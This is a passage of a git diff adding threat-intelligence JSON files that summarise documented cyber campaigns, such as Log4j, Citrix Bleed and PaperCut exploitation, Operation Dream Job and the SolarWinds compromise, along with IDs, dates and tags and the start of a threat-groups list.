unpatched VMware Horizon server. Post-exploit activities included installing XMRig crypto mining software and executing Mimikatz to harvest credentials, as well as moving laterally to the domain controller and implanting Ngrok reverse proxies on multiple hosts to maintain persistence.\n\nAdditional details, including incident response guidance and relevant mitigations, can be found in the [source report](https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-320a).[[U.S. CISA Advisory November 25 2022](/references/daae1f54-8471-4620-82d5-023d04144acd)]\n\n**Related Vulnerabilities**: CVE-2021-44228[[U.S. CISA Advisory November 25 2022](/references/daae1f54-8471-4620-82d5-023d04144acd)]", + "meta": { + "campaign_attack_id": "C5008", + "first_seen": "2022-06-15T00:00:00Z", + "last_seen": "2022-07-15T00:00:00Z", + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "15787198-6c8b-4f79-bf50-258d55072fee", + "7e6ef160-8e4f-4132-bdc4-9991f01c472e" + ] + }, + "related": [], + "uuid": "7d6ff40d-51f3-42f8-b986-e7421f59b4bd", + "value": "Iranian APT Credential Harvesting & Cryptomining Activity" + }, + { + "description": "In November 2020, U.S. cybersecurity authorities released joint Cybersecurity Advisory AA20-304A, which detailed efforts by an unspecified Iranian advanced persistent threat (APT) actor to target U.S. state websites, including election-related sites, with the goal of obtaining voter registration data. The actors used a legitimate vulnerability scanner, Acunetix, to scan state election websites, and they attempted to exploit sites with directory traversal, SQL injection, and web shell upload attacks. Authorities confirmed the actors successfully obtained voter registration data in at least one state – after abusing a website misconfiguration, they used a cURL-based scripting tool to iterate through and retrieve voter records. Officials assessed that the actor behind the website attacks is responsible for mass dissemination of intimidation emails to U.S. citizens and a disinformation campaign featuring a U.S. election-related propaganda video in mid-October 2020. Authorities furthermore assessed that information obtained during the website attacks was featured in the propaganda video.[[U.S. CISA Iran Voter Data November 3 2020](/references/be89be75-c33f-4c58-8bf0-979c1debaad7)]", + "meta": { + "campaign_attack_id": "C5010", + "first_seen": "2020-09-20T00:00:00Z", + "last_seen": "2020-10-20T00:00:00Z", + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [] + }, + "related": [], + "uuid": "18cf25b5-ed3a-40f6-bf0a-a3938a4f8da2", + "value": "Iranian APT Targeting U.S. Voter Data" + }, + { + "description": "In September 2022, U.S., Canadian, United Kingdom, and Australian cybersecurity authorities released joint Cybersecurity Advisory AA22-257A, which detailed malicious cyber activity attributed to advanced persistent threat (APT) actors affiliated with the Iranian government’s Islamic Revolutionary Guard Corps (IRGC). The advisory updated a previous alert (AA21-321A), published in November 2021, and summarized recent activities linked to the actors. Since at least March 2021, the actors were observed targeting victims in a wide range of U.S. critical infrastructure sectors, including transportation and healthcare, and victims in unspecified sectors in Australia, Canada, and the United Kingdom.\n\nThe actors typically exploited vulnerabilities to gain initial network access. They were observed exploiting vulnerabilities in Microsoft Exchange servers (ProxyShell) and Fortinet devices in 2021, and VMware Horizon (Log4j) in 2022. After gaining access, the actors typically evaluated the perceived value of data held within a victim network and either encrypted it for ransom and/or exfiltrated it. The actors are believed to have sold some exfiltrated data or used it as leverage to further pressure victims into paying a ransom.\n\nIn addition to behavioral observations and indicators of compromise, the advisories provided detection and mitigation guidance, which can be found in the source reports [here](https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-257a) and [here](https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a).\n\n**Related Vulnerabilities**: CVE-2021-34523, CVE-2021-31207, CVE-2021-44228, CVE-2021-45046, CVE-2021-45105[[U.S. CISA IRGC Actors September 14 2022](/references/728b20b0-f702-4dbe-afea-50270648a3a2)], CVE-2021-34473, CVE-2018-13379, CVE-2020-12812, CVE-2019-5591[[U.S. CISA Iranian Government Actors November 19 2021](/references/d7014279-bc6a-43d4-953a-a6bc1d97a13b)]", + "meta": { + "campaign_attack_id": "C5009", + "first_seen": "2021-03-01T00:00:00Z", + "last_seen": "2022-09-14T00:00:00Z", + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172", + "15787198-6c8b-4f79-bf50-258d55072fee", + "d84be7c9-c652-4a43-a79e-ef0fa2318c58", + "1423b5a8-cff3-48d5-a0a2-09b3afc9f195", + "1b98f09a-7d93-4abb-8f3e-1eacdb9f9871", + "fde4c246-7d2d-4d53-938b-44651cf273f1", + "c3779a84-8132-4c62-be2f-9312ad41c273", + "c035da8e-f96c-4793-885d-45017d825596", + "7e6ef160-8e4f-4132-bdc4-9991f01c472e", + "d713747c-2d53-487e-9dac-259230f04460", + "964c2590-4b52-48c6-afff-9a6d72e68908" + ] + }, + "related": [], + "uuid": "338c6497-2b13-4c2b-bd45-d8b636c35cac", + "value": "Iranian IRGC Data Extortion Operations" + }, + { + "description": "This object represents a collection of MITRE ATT&CK® Techniques and other objects (Groups and/or Software) related to joint Cybersecurity Advisory AA24-060B, which detailed recent exploits of vulnerabilities (CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893) affecting Ivanti Connect Secure and Policy Secure VPN and gateway appliances by unspecified threat actors. Further background & contextual details can be found in the References tab below.", + "meta": { + "campaign_attack_id": "C5017", + "first_seen": "2023-12-01T00:00:00Z", + "last_seen": "2024-02-29T00:00:00Z", + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "758c3085-2f79-40a8-ab95-f8a684737927", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "d1ab6bd6-2688-4e54-a1d3-d180bb8fd41a", + "1ff4614e-0ee6-4e04-921d-61abba7fcdb7", + "e00b65fc-8f56-4a9e-9f09-ccf3124a3272" + ] + }, + "related": [], + "uuid": "c2544d1d-3c99-4601-86fe-8b62020aaffc", + "value": "Ivanti Gateway Vulnerability Exploits" + }, + { + "description": "In July 2023, U.S. Cybersecurity & Infrastructure Security Agency authorities released Cybersecurity Advisory AA23-201A, which detailed an observed exploit of a zero-day vulnerability (CVE-2023-3519) affecting NetScaler (formerly Citrix) Application Delivery Controller (\"ADC\") and NetScaler Gateway appliances. According to the Advisory, the exploitation activity occurred in June 2023, and the victim (an undisclosed entity in the critical infrastructure sector) reported it in July 2023.[[U.S. CISA CVE-2023-3519 Exploits](/references/021c4caa-7a7a-4e49-9c5c-6eec176bf923)] Citrix acknowledged the reported exploit of the vulnerability, which enables unauthenticated remote code execution, and released a patch on July 18, 2023.[[Citrix Bulletin CVE-2023-3519](/references/245ef1b7-778d-4df2-99a9-b51c95c57580)]\n\nAfter achieving initial access via exploit of CVE-2023-3519, threat actors dropped a web shell on the vulnerable ADC appliance, which was present on a non-production environment. The web shell enabled subsequent information discovery on the victim's Active Directory (\"AD\"), followed by collection and exfiltration of AD-related data. The actors also attempted lateral movement to a domain controller, but the Advisory indicated that network segementation controls for the ADC appliance blocked this attempted activity.[[U.S. CISA CVE-2023-3519 Exploits](/references/021c4caa-7a7a-4e49-9c5c-6eec176bf923)] Separately, in a blog on CVE-2023-3519 exploit investigations released the day after the CISA Advisory, Mandiant indicated that the type of activity observed is \"consistent with previous operations by China-nexus actors\".[[Mandiant CVE-2023-3519 Exploitation](/references/4404ed65-3020-453d-8c51-2885018ba03b)]\n\n**Related Vulnerabilities**: CVE-2023-3519[[U.S. CISA CVE-2023-3519 Exploits](/references/021c4caa-7a7a-4e49-9c5c-6eec176bf923)]", + "meta": { + "campaign_attack_id": "C5001", + "first_seen": "2023-06-01T00:00:00Z", + "last_seen": "2023-06-30T00:00:00Z", + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "a98d7a43-f227-478e-81de-e7299639a355", + "c475ad68-3fdc-4725-8abc-784c56125e96" + ] + }, + "related": [], + "uuid": "86e3565d-93dc-40e5-8f84-20d1c15b8e9d", + "value": "June 2023 Citrix Vulnerability Exploitation" + }, + { + "description": "In November 2023, U.S. cybersecurity authorities and international partners released Cybersecurity Advisory AA23-325A, which detailed observed exploitation of CVE-2023-4966 (known colloquially as the “Citrix Bleed” vulnerability) by threat actors believed to be affiliated with the LockBit ransomware operation.\n\nCitrix Bleed is a vulnerability in Citrix NetScaler web application delivery control (“ADC”) and NetScaler Gateway appliances, which allows adversaries to bypass password requirements and multifactor authentication, enabling hijacking of legitimate user sessions and subsequent credential harvesting, lateral movement, and data or resource access. Authorities indicated that they expected “widespread” Citrix Bleed exploitation on unpatched services due to the ease of carrying out the exploit.\n\nAfter successful Citrix Bleed exploitation, LockBit affiliates were observed using a variety of follow-on TTPs and using a range of software, including abuse of native utilities and popular legitimate remote management and monitoring (“RMM”) tools. Indicators of compromise associated with recent intrusions and further incident response and mitigation guidance can be found in the [source report](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a).[[U.S. CISA LockBit Citrix Bleed November 21 2023](/references/21f56e0c-9605-4fbb-9cb1-f868ba6eb053)] Public reporting suggested that actors associated with the Medusa and Qilin ransomware operations, plus other unknown ransomware and uncategorized actors, had also exploited Citrix Bleed as part of their operations.[[Malwarebytes Citrix Bleed November 24 2023](/references/fdc86cea-0015-48d1-934f-b22244de6306)][[Cybernews Yanfeng Qilin November 2023](/references/93c89ca5-1863-4ee2-9fff-258f94f655c4)]", + "meta": { + "campaign_attack_id": "C5011", + "first_seen": "2023-08-01T00:00:00Z", + "last_seen": "2023-11-16T00:00:00Z", + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "15b77e5c-2285-434d-9719-73c14beba8bd", + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ] + }, + "related": [], + "uuid": "f4225d6a-8734-401f-aa2a-1a73c23b16e6", + "value": "LockBit Affiliate Citrix Bleed Exploits" + }, + { + "description": "[Night Dragon](https://app.tidalcyber.com/campaigns/85f136b3-d5a3-4c4c-a37c-40e4418dc989) was a cyber espionage campaign that targeted oil, energy, and petrochemical companies, along with individuals and executives in Kazakhstan, Taiwan, Greece, and the United States. The unidentified threat actors searched for information related to oil and gas field production systems, financials, and collected data from SCADA systems. Based on the observed techniques, tools, and network activities, security researchers assessed the campaign involved a threat group based in China.[[McAfee Night Dragon](https://app.tidalcyber.com/references/242d2933-ca2b-4511-803a-454727a3acc5)]", + "meta": { + "campaign_attack_id": "C0002", + "first_seen": "2009-11-01T04:00:00Z", + "last_seen": "2011-02-01T05:00:00Z", + "source": "MITRE", + "tags": [] + }, + "related": [], + "uuid": "85f136b3-d5a3-4c4c-a37c-40e4418dc989", + "value": "Night Dragon" + }, + { + "description": "[Operation CuckooBees](https://app.tidalcyber.com/campaigns/81bf4e45-f0d3-4fec-a9d4-1259cf8542a1) was a cyber espionage campaign targeting technology and manufacturing companies in East Asia, Western Europe, and North America since at least 2019. Security researchers noted the goal of [Operation CuckooBees](https://app.tidalcyber.com/campaigns/81bf4e45-f0d3-4fec-a9d4-1259cf8542a1), which was still ongoing as of May 2022, was likely the theft of proprietary information, research and development documents, source code, and blueprints for various technologies. Researchers assessed [Operation CuckooBees](https://app.tidalcyber.com/campaigns/81bf4e45-f0d3-4fec-a9d4-1259cf8542a1) was conducted by actors affiliated with [Winnti Group](https://app.tidalcyber.com/groups/6932662a-53a7-4e43-877f-6e940e2d744b), [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9), and BARIUM.[[Cybereason OperationCuckooBees May 2022](https://app.tidalcyber.com/references/fe3e2c7e-2287-406c-b717-cf7721b5843a)]", + "meta": { + "campaign_attack_id": "C0012", + "first_seen": "2019-12-01T07:00:00Z", + "last_seen": "2022-05-01T06:00:00Z", + "source": "MITRE", + "tags": [] + }, + "related": [], + "uuid": "81bf4e45-f0d3-4fec-a9d4-1259cf8542a1", + "value": "Operation CuckooBees" + }, + { + "description": "[Operation Dream Job](https://app.tidalcyber.com/campaigns/9a94e646-cbe5-54a1-8bf6-70ef745e641b) was a cyber espionage operation likely conducted by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) that targeted the defense, aerospace, government, and other sectors in the United States, Israel, Australia, Russia, and India. In at least one case, the cyber actors tried to monetize their network access to conduct a business email compromise (BEC) operation. In 2020, security researchers noted overlapping TTPs, to include fake job lures and code similarities, between [Operation Dream Job](https://app.tidalcyber.com/campaigns/9a94e646-cbe5-54a1-8bf6-70ef745e641b), Operation North Star, and Operation Interception; by 2022 security researchers described [Operation Dream Job](https://app.tidalcyber.com/campaigns/9a94e646-cbe5-54a1-8bf6-70ef745e641b) as an umbrella term covering both Operation Interception and Operation North Star.[[ClearSky Lazarus Aug 2020](https://app.tidalcyber.com/references/2827e6e4-8163-47fb-9e22-b59e59cd338f)][[McAfee Lazarus Jul 2020](https://app.tidalcyber.com/references/43581a7d-d71a-4121-abb6-127483a49d12)][[ESET Lazarus Jun 2020](https://app.tidalcyber.com/references/b16a0141-dea3-4b34-8279-7bc1ce3d7052)][[The Hacker News Lazarus Aug 2022](https://app.tidalcyber.com/references/8ae38830-1547-5cc1-83a4-87c3a7c82aa6)]", + "meta": { + "campaign_attack_id": "C0022", + "first_seen": "2019-09-01T04:00:00Z", + "last_seen": "2020-08-01T04:00:00Z", + "source": "MITRE", + "tags": [] + }, + "related": [], + "uuid": "9a94e646-cbe5-54a1-8bf6-70ef745e641b", + "value": "Operation Dream Job" + }, + { + "description": "[Operation Dust Storm](https://app.tidalcyber.com/campaigns/af0c0f55-dc4f-4cb5-9350-3a2d7c07595f) was a long-standing persistent cyber espionage campaign that targeted multiple industries in Japan, South Korea, the United States, Europe, and several Southeast Asian countries. By 2015, the [Operation Dust Storm](https://app.tidalcyber.com/campaigns/af0c0f55-dc4f-4cb5-9350-3a2d7c07595f) threat actors shifted from government and defense-related intelligence targets to Japanese companies or Japanese subdivisions of larger foreign organizations supporting Japan's critical infrastructure, including electricity generation, oil and natural gas, finance, transportation, and construction.[[Cylance Dust Storm](https://app.tidalcyber.com/references/001dd53c-74e6-4add-aeb7-da76b0d2afe8)]\n\n[Operation Dust Storm](https://app.tidalcyber.com/campaigns/af0c0f55-dc4f-4cb5-9350-3a2d7c07595f) threat actors also began to use Android backdoors in their operations by 2015, with all identified victims at the time residing in Japan or South Korea.[[Cylance Dust Storm](https://app.tidalcyber.com/references/001dd53c-74e6-4add-aeb7-da76b0d2afe8)]", + "meta": { + "campaign_attack_id": "C0016", + "first_seen": "2010-01-01T07:00:00Z", + "last_seen": "2016-02-01T06:00:00Z", + "source": "MITRE", + "tags": [] + }, + "related": [], + "uuid": "af0c0f55-dc4f-4cb5-9350-3a2d7c07595f", + "value": "Operation Dust Storm" + }, + { + "description": "[Operation Ghost](https://app.tidalcyber.com/campaigns/1fcfe949-5f96-578e-86ad-069ba123c867) was an [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) campaign starting in 2013 that included operations against ministries of foreign affairs in Europe and the Washington, D.C. embassy of a European Union country. During [Operation Ghost](https://app.tidalcyber.com/campaigns/1fcfe949-5f96-578e-86ad-069ba123c867), [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) used new families of malware and leveraged web services, steganography, and unique C2 infrastructure for each victim.[[ESET Dukes October 2019](https://app.tidalcyber.com/references/fbc77b85-cc5a-4c65-956d-b8556974b4ef)]\n", + "meta": { + "campaign_attack_id": "C0023", + "first_seen": "2013-09-01T04:00:00Z", + "last_seen": "2019-10-01T04:00:00Z", + "source": "MITRE", + "tags": [] + }, + "related": [], + "uuid": "1fcfe949-5f96-578e-86ad-069ba123c867", + "value": "Operation Ghost" + }, + { + "description": "[Operation Honeybee](https://app.tidalcyber.com/campaigns/f741ed36-2d52-40ae-bbdc-70722f4071c7) was a campaign that targeted humanitarian aid and inter-Korean affairs organizations from at least late 2017 through early 2018. [Operation Honeybee](https://app.tidalcyber.com/campaigns/f741ed36-2d52-40ae-bbdc-70722f4071c7) initially targeted South Korea, but expanded to include Vietnam, Singapore, Japan, Indonesia, Argentina, and Canada. Security researchers assessed the threat actors were likely Korean speakers based on metadata used in both lure documents and executables, and named the campaign \"Honeybee\" after the author name discovered in malicious Word documents.[[McAfee Honeybee](https://app.tidalcyber.com/references/e6f0f7b5-01fe-437f-a9c9-2ea054e7d69d)] ", + "meta": { + "campaign_attack_id": "C0006", + "first_seen": "2017-08-01T05:00:00Z", + "last_seen": "2018-02-01T06:00:00Z", + "source": "MITRE", + "tags": [] + }, + "related": [], + "uuid": "f741ed36-2d52-40ae-bbdc-70722f4071c7", + "value": "Operation Honeybee" + }, + { + "description": "[Operation Sharpshooter](https://app.tidalcyber.com/campaigns/57e858c8-fd0b-4382-a178-0165d03aa8a9) was a global cyber espionage campaign that targeted nuclear, defense, government, energy, and financial companies, with many located in Germany, Turkey, the United Kingdom, and the United States. Security researchers noted the campaign shared many similarities with previous [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) operations, including fake job recruitment lures and shared malware code.[[McAfee Sharpshooter December 2018](https://app.tidalcyber.com/references/96b6d012-8620-4ef5-bf9a-5f88e465a495)][[Bleeping Computer Op Sharpshooter March 2019](https://app.tidalcyber.com/references/84430646-6568-4288-8710-2827692a8862)][[Threatpost New Op Sharpshooter Data March 2019](https://app.tidalcyber.com/references/2361b5b1-3a01-4d77-99c6-261f444a498e)] ", + "meta": { + "campaign_attack_id": "C0013", + "first_seen": "2017-09-01T05:00:00Z", + "last_seen": "2019-03-01T06:00:00Z", + "source": "MITRE", + "tags": [] + }, + "related": [], + "uuid": "57e858c8-fd0b-4382-a178-0165d03aa8a9", + "value": "Operation Sharpshooter" + }, + { + "description": "[Operation Spalax](https://app.tidalcyber.com/campaigns/98d3a8ac-6af9-4471-83f6-e880ca70261f) was a campaign that primarily targeted Colombian government organizations and private companies, particularly those associated with the energy and metallurgical industries. The [Operation Spalax](https://app.tidalcyber.com/campaigns/98d3a8ac-6af9-4471-83f6-e880ca70261f) threat actors distributed commodity malware and tools using generic phishing topics related to COVID-19, banking, and law enforcement action. Security researchers noted indicators of compromise and some infrastructure overlaps with other campaigns dating back to April 2018, including at least one separately attributed to [APT-C-36](https://app.tidalcyber.com/groups/153c14a6-31b7-44f2-892e-6d9fdc152267), however identified enough differences to report this as separate, unattributed activity.[[ESET Operation Spalax Jan 2021](https://app.tidalcyber.com/references/b699dd10-7d3f-4542-bf8a-b3f0c747bd0e)] ", + "meta": { + "campaign_attack_id": "C0005", + "first_seen": "2019-11-01T05:00:00Z", + "last_seen": "2021-01-01T06:00:00Z", + "source": "MITRE", + "tags": [] + }, + "related": [], + "uuid": "98d3a8ac-6af9-4471-83f6-e880ca70261f", + "value": "Operation Spalax" + }, + { + "description": "[Operation Wocao](https://app.tidalcyber.com/campaigns/56e4e10f-8c8c-4b7c-8355-7ed89af181be) was a cyber espionage campaign that targeted organizations around the world, including in Brazil, China, France, Germany, Italy, Mexico, Portugal, Spain, the United Kingdom, and the United States. The suspected China-based actors compromised government organizations and managed service providers, as well as aviation, construction, energy, finance, health care, insurance, offshore engineering, software development, and transportation companies.[[FoxIT Wocao December 2019](https://app.tidalcyber.com/references/aa3e31c7-71cd-4a3f-b482-9049c9abb631)]\n\nSecurity researchers assessed the [Operation Wocao](https://app.tidalcyber.com/campaigns/56e4e10f-8c8c-4b7c-8355-7ed89af181be) actors used similar TTPs and tools as APT20, suggesting a possible overlap. [Operation Wocao](https://app.tidalcyber.com/campaigns/56e4e10f-8c8c-4b7c-8355-7ed89af181be) was named after an observed command line entry by one of the threat actors, possibly out of frustration from losing webshell access.[[FoxIT Wocao December 2019](https://app.tidalcyber.com/references/aa3e31c7-71cd-4a3f-b482-9049c9abb631)]", + "meta": { + "campaign_attack_id": "C0014", + "first_seen": "2017-12-01T05:00:00Z", + "last_seen": "2019-12-01T05:00:00Z", + "source": "MITRE", + "tags": [] + }, + "related": [], + "uuid": "56e4e10f-8c8c-4b7c-8355-7ed89af181be", + "value": "Operation Wocao" + }, + { + "description": "In May 2023, U.S. Cybersecurity & Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) authorities released Cybersecurity Advisory AA23-131A, which detailed observed exploits of a vulnerability, CVE-2023-27350, affecting certain versions of PaperCut NG and PaperCut MF, software applications for print management. PaperCut released a patch for the vulnerability in March 2023.[[PaperCut MF/NG vulnerability bulletin](/references/d6e71b45-fc91-40f4-8201-2186994ae42a)] According to the Advisory, authorities observed unspecified threat actors exploiting the vulnerability in mid-April 2023, followed by exploitation by the self-identified Bl00dy Ransomware Gang the following month.[[U.S. CISA PaperCut May 2023](/references/b5ef2b97-7cc7-470b-ae97-a45dc4af32a6)]\n\nCVE-2023-27350 allows a remote actor to bypass authentication and remotely execute code on servers running affected versions of PaperCut software. In May, U.S. authorities observed Bl00dy Ransomware Gang actors exploiting the vulnerability to achieve initial access into education sector entities' networks and ingressing both legitimate remote management and maintenance (RMM) tools and several other command and control-related malware, including Lizar, Truebot, and Cobalt Strike. In some cases, the actors ultimately exfiltrated victim data and encrypted files, demanding payment in order to decrypt affected systems (the Advisory did not indicate how precisely actors encrypted data). The Advisory indicated that the \"Education Facilities Subsector\" maintains nearly 70% of exposed (but not necessarily vulnerable) U.S.-based PaperCut servers.[[U.S. CISA PaperCut May 2023](/references/b5ef2b97-7cc7-470b-ae97-a45dc4af32a6)]\n\nThe Advisory instructed defenders to focus CVE-2023-27350 detection efforts on three areas: network traffic signatures, system monitoring, and server settings and log files. More details and resources for detection can be found in the [source report](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-131a).\n\n**Related Vulnerabilities**: CVE-2023-27350[[U.S. CISA PaperCut May 2023](/references/b5ef2b97-7cc7-470b-ae97-a45dc4af32a6)]", + "meta": { + "campaign_attack_id": "C5003", + "first_seen": "2023-04-15T00:00:00Z", + "last_seen": "2023-05-30T00:00:00Z", + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172", + "15787198-6c8b-4f79-bf50-258d55072fee", + "a98d7a43-f227-478e-81de-e7299639a355", + "992bdd33-4a47-495d-883a-58010a2f0efb" + ] + }, + "related": [], + "uuid": "38443d11-135a-47ac-909f-fa34744bc3a5", + "value": "PaperCut Vulnerability Exploitation" + }, + { + "description": "*Operationalize this intelligence by pivoting to relevant defensive resources via the Techniques below. Alternatively, use the **Add to Matrix** button above, then overlay entire sets of capabilities from your own defensive stack to identify threat overlaps & potential gaps (watch a [60-second tutorial here](https://www.youtube.com/watch?v=4jBo3XLO01E)).*\n\nThis is a single object to represent the initial access and delivery methods observed with Pikabot distribution in the first year after its discovery. Distribution campaigns have been linked to the TA577 threat actor (previously known for distributing payloads including QakBot, IcedID, SystemBC, and Cobalt Strike)[[Malwarebytes Pikabot December 15 2023](/references/50b29ef4-7ade-4672-99b6-fdf367170a5b)][[Unit42 Malware Roundup December 29 2023](/references/a18e19b5-9046-4c2c-bd94-2cd5061064bf)]; however, the Technique- and Procedure level intelligence associated with these campaigns that is provided below was not explicitly linked to that group, so we are providing this intelligence to users in this Campaign form. The Water Curupira intrusion set (affiliated with the Black Basta ransomware operation) has also been observed distributing Pikabot.[[Trend Micro Pikabot January 9 2024](/references/dc7d882b-4e83-42da-8e2f-f557b675930a)]", + "meta": { + "campaign_attack_id": "C5013", + "first_seen": "2023-02-01T00:00:00Z", + "last_seen": "2023-12-31T00:00:00Z", + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f", + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ] + }, + "related": [], + "uuid": "71f6d3b1-c45e-421c-99cb-3b695647cf0b", + "value": "Pikabot Distribution Campaigns 2023" + }, + { + "description": "The [SolarWinds Compromise](https://app.tidalcyber.com/campaigns/8bde8146-0656-5800-82e6-e24e008e4f4a) was a sophisticated supply chain cyber operation conducted by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) that was discovered in mid-December 2020. [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) used customized malware to inject malicious code into the SolarWinds Orion software build process that was later distributed through a normal software update; they also used password spraying, token theft, API abuse, spear phishing, and other supply chain attacks to compromise user accounts and leverage their associated access. Victims of this campaign included government, consulting, technology, telecom, and other organizations in North America, Europe, Asia, and the Middle East. Industry reporting initially referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, Dark Halo, and SolarStorm.[[SolarWinds Advisory Dec 2020](https://app.tidalcyber.com/references/4e8b908a-bdc5-441b-bc51-98dfa87f6b7a)][[SolarWinds Sunburst Sunspot Update January 2021](https://app.tidalcyber.com/references/1be1b6e0-1b42-4d07-856b-b6321c17bb88)][[FireEye SUNBURST Backdoor December 2020](https://app.tidalcyber.com/references/d006ed03-a8af-4887-9356-3481d81d43e4)][[Volexity SolarWinds](https://app.tidalcyber.com/references/355cecf8-ef3e-4a6e-a652-3bf26fe46d88)][[CrowdStrike StellarParticle January 2022](https://app.tidalcyber.com/references/149c1446-d6a1-4a63-9420-def9272d6cb9)][[Unit 42 SolarStorm December 2020](https://app.tidalcyber.com/references/ecbb602a-2427-5eba-8c2b-25d90c95f166)][[Microsoft Analyzing Solorigate Dec 2020](https://app.tidalcyber.com/references/8ad72d46-ba2c-426f-bb0d-eb47723c8e11)][[Microsoft Internal Solorigate Investigation Blog](https://app.tidalcyber.com/references/66cade99-0040-464c-98a6-bba57719f0a4)] \n\nIn April 2021, the US and UK governments attributed the [SolarWinds Compromise](https://app.tidalcyber.com/campaigns/8bde8146-0656-5800-82e6-e24e008e4f4a) to Russia's Foreign Intelligence Service (SVR); public statements included citations to [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447), Cozy Bear, and The Dukes.[[NSA Joint Advisory SVR SolarWinds April 2021](https://app.tidalcyber.com/references/43d9c469-1d54-454b-ba67-74e7f1de9c10)][[UK NSCS Russia SolarWinds April 2021](https://app.tidalcyber.com/references/f49e6780-8caa-4c3c-8d68-47a2cc4319a1)][[Mandiant UNC2452 APT29 April 2022](https://app.tidalcyber.com/references/5276508c-6792-56be-b757-e4b495ef6c37)] The US government assessed that of the approximately 18,000 affected public and private sector customers of Solar Winds’ Orion product, a much smaller number were compromised by follow-on [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) activity on their systems.[[USG Joint Statement SolarWinds January 2021](https://app.tidalcyber.com/references/336a6549-a95d-5763-bbaf-5ef0d3141800)] ", + "meta": { + "campaign_attack_id": "C0024", + "first_seen": "2019-08-01T05:00:00Z", + "last_seen": "2021-01-01T06:00:00Z", + "source": "MITRE", + "tags": [ + "f2ae2283-f94d-4f8f-bbde-43f2bed66c55" + ] + }, + "related": [], + "uuid": "8bde8146-0656-5800-82e6-e24e008e4f4a", + "value": "SolarWinds Compromise" + } + ] +} diff --git a/clusters/tidal-groups.json b/clusters/tidal-groups.json new file mode 100644 index 0000000..b4b835d --- /dev/null +++ b/clusters/tidal-groups.json @@ -0,0 +1,10742 @@ +{ + "authors": "Tidal", + "category": "Threat Groups", + "description": "Tidal Threat Groups Cluster", + "name": "Tidal Threat Groups", + "source": "Tidal", + "type": "groups", + "uuid": "41c3e5c0-de5c-4edb-b48b-48cd8e7519e6", + "values": [ + { + "description": "[admin@338](https://app.tidalcyber.com/groups/8567136b-f84a-45ed-8cce-46324c7da60e) is a China-based cyber threat group. It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial, economic, and trade policy, typically using publicly available RATs such as [PoisonIvy](https://app.tidalcyber.com/software/1d87a695-7989-49ae-ac1a-b6601db565c3), as well as some non-public backdoors. [[FireEye admin@338](https://app.tidalcyber.com/references/f3470275-9652-440e-914d-ad4fc5165413)]", + "meta": { + "country": "CN", + "group_attack_id": "G0018", + "observed_countries": [ + "HK", + "US" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Financial Services" + ] + }, + "related": [ + { + "dest-uuid": "ac4bce1f-b3ec-4c44-bd36-b6cc986b319b", + "type": "similar" + } + ], + "uuid": "8567136b-f84a-45ed-8cce-46324c7da60e", + "value": "admin@338" + }, + { + "description": "Analysis of infrastructure, tools, and modes of operation revealed a potential relationship between [Ajax Security Team](https://app.tidalcyber.com/groups/e38bcb42-12c1-4202-a794-ec26cd830caa) and the campaign Operation Woolen-Goldfish.[[Check Point Rocket Kitten](https://app.tidalcyber.com/references/71da7d4c-f1f8-4f5c-a609-78a414851baf)][[TrendMicro Operation Woolen Goldfish March 2015](https://app.tidalcyber.com/references/0f077c93-aeda-4c95-9996-c52812a31267)]", + "meta": { + "id": "c63555ae-395f-49dd-b279-b6b85c33e41f" + }, + "related": [ + { + "dest-uuid": "e38bcb42-12c1-4202-a794-ec26cd830caa", + "type": "similar" + } + ], + "uuid": "9585b539-c040-40a6-a94c-fcf8afa786e2", + "value": "Operation Woolen-Goldfish" + }, + { + "description": "[[FireEye Operation Saffron Rose 2013](https://app.tidalcyber.com/references/2f4c0941-d14e-4eb8-828c-f1d9a1e14a95)]", + "meta": { + "id": "b14e52c9-267e-484b-b3af-14844e5634f5" + }, + "related": [ + { + "dest-uuid": "e38bcb42-12c1-4202-a794-ec26cd830caa", + "type": "similar" + } + ], + "uuid": "81051e64-7fde-44c5-816e-a85b25a02e11", + "value": "AjaxTM" + }, + { + "description": "[[CrowdStrike Flying Kitten 